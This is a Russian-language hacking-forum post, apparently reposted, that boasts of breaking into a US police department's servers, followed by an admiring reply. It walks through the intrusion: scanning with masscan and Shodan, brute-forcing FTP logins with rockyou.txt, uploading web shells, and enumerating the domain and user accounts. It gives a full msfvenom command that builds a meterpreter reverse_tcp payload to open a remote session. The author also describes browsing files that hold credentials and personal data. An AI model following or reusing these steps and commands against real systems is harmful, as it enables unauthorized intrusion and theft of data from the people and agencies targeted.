Как я ломал копов USA

DiNo

New member
Статья не моя. Все повествование пойдет от первого лица автора истории, по возможности постараюсь дополнить материал полезной инфой, для лучшего понимания.

Кидайте + если понравилось


Приветствую, мой дорогой читатель. В этой части я хочу рассказать тебе историю которая была проделана за один присест и затяг сигаретки. Пару дней ломал голову и сегодня решил всё таки изучить правда ли всё так плохо в плане ИБ в USA а именно в критических узлах..

Сегодня мы будет говорить о том как можно получить доступ к серверам и к локальной сетке целого ментовского департамента, лично мне было интересно изучать и потратить день на конечный результат и получить свою дозу андреналина и эндорфина.

Сразу отступаясь от начала хочу сказать одно. Не были зашифрованы или как то атакованы другие узлы сети копов.

Последние волосы с головы были сорваны, самовар заварен, пепельница помыта, носок натянут и началась работа по сбору информации:
1. информации о департаментах полиций во всех штатах;
2. был натравлен masscan на интересные подсети;
3. была выгружена вся возможная информация с боевого товарища Shodan ^ Fofa ^ Censys
Shodan — это первая (и, пожалуй, ведущая) поисковая система по Интернету вещей, существующая уже более семи лет.
4. были проенумерованы все возможные домены : sublist3r в помощь + словари для брута под доменов
5. были пробручены пассы сервисов на великий Rockyou.txt

К вечеру мой cherrytree был полон информации для анализа и дальнейшего мозгового штурма. Кто не знает что такое
CherryTree — это приложение предназначенное для записи коротких заметок и мыслей.
Томми ловит 3 звезды : копы преследуют нас
Скажу сразу, не стал до конца изучать и копать весь материал... Потому что на момент брута FTP сервиса на нужных IP, был получен ACCESS GRANTED на несколько штук. В основном старые файлы и дистрибутивы ПО 200x годов.
Но один из них нас и порадовал.
Были проверены права на запись и чтение, о Боги права на запись были, наш CherryTree тихо шепчет нам о том что на данном IP по ssl имеется веб морда..




Незамедлительно был залитWebShell, но он не сработал отдав ошибкуApplication Error.. была стянута пачка шеллов и один из них всё таки работал стабильно.











WHOAMI ?nt authority etwork service






Проверяем в домене ли сервак?wmic computersystem get domain



Посмотрим учетные записи ?net users




msfvenom наш товарищ, твой выход! генерим простой .exe и забираем сессию, так как мы не преследуем цели коммерческого обогащения а лишь интереса ради делаем все агрессивно!!!
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ИП LPORT=порт -f exe > meterpreter.exe
кладем файлик в C: emp




Ловим долгожданную сессию meterpreter и изучаем хост. Например ?









Томми ловит 6 звезд : копы на танках...
Погуляем по папкам и файлам. Но креды, ФИО и другие данные не будут показываться в целях безопасности 5-й точки.
















Моя мысль? Всё можно найти и поломать...
Главное терпение и немного удачи в нужное время.

Не стал дальше пробивать машины в локалке
Не стал повышаться в правах до админа или системы
Не стал захватывать АД..

Хотя всё это смог бы сделать, остановило лишь одно. я сделал то чего хотел изначально )
 

Vladser

New member
Вот сидишь такой со своей проблемой и думаешь, ее сложно реализовать, нужно больше знаний, ресурсов или чье-то помощь, и потихоньку можешь даже думать что это для тебя не реально, и вот как раз такие статьи дают вспомнить что в этом мире есть много возможностей и шансов, и если какой-то тип из-за простого интереса сломал базу департамента полиции в юса, то твои размышления о сложности мира полная хрень)) И ты довольный продолжаешь работать полный энтузиазма, у меня как-то так)
 
Яндекс.Метрика
Сверху